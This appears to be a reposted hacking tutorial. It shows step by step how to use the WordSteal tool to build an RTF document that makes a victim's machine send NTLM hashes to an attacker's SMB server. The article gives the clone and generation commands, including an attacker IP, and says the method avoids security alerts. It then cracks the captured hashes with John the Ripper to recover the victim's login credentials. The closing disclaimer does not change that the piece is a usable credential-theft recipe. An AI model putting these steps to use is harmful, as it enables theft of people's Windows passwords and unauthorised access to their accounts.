Stealing Windows credentials using MS Office Document

xa-

This script will create a POC that will steal NTML hashes from a remote computer.

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature but was found used by malware creators to include images through http for statistics. We can also include remote files to an SMB server and the victim will authenticate with his login credentials. This is very useful during a pentest because allows you to steal credentials without triggering any alerts and most of security apps do not detect this.

First, we need to download it from Github, open a terminal in Kali Linux and enter the following command.

git clone https://github.com/0x090x0/WordSteal.git

Now open the downloaded word steal folder where you will get the “main.py” python script and grant all permissions to the main.py script if needed.

 chmod 777 main.py

As the author described, this script will convert an image or say .jpg to .rtf (Microsoft Word file). The Rich Text Format is a proprietary published specification document file format developed by Microsoft for cross-platform document exchange with Microsoft products. …

After that, download the image and save it in the Wordsteal folder, since I currently have a “1.jpg” image, we need to enter the following command which generates an .rtf file that steals NTLM hashes from the remote computer.

python main.py 192.168.0.104 1.jpeg 1

The above command will generate a .rtf file as you can see in this screenshot after sending the 1.rtf file to the remote computer.

When the victim opens 1.rtf (like a Microsoft Word file) on their system, on the other hand, the attack will receive NTLM hashes.

Inside Word Steal, we have stolen credentials without triggering any alerts, which you can observe in the following image. Now use john the ripper password cracking tool to crack the hashes in the netntlmv2 password file, or enter the following command:

John password_netntlmv2

We can see the victim’s credentials that can be used to log in.

Article credit - primetechie

Disclaimer
This content has been shared under Educational And Non-Profit Purposes Only.
Do not use this for illegal purposes.
The author and the Site (Hacksnation.com) does not keep responsibility for any illegal action you do.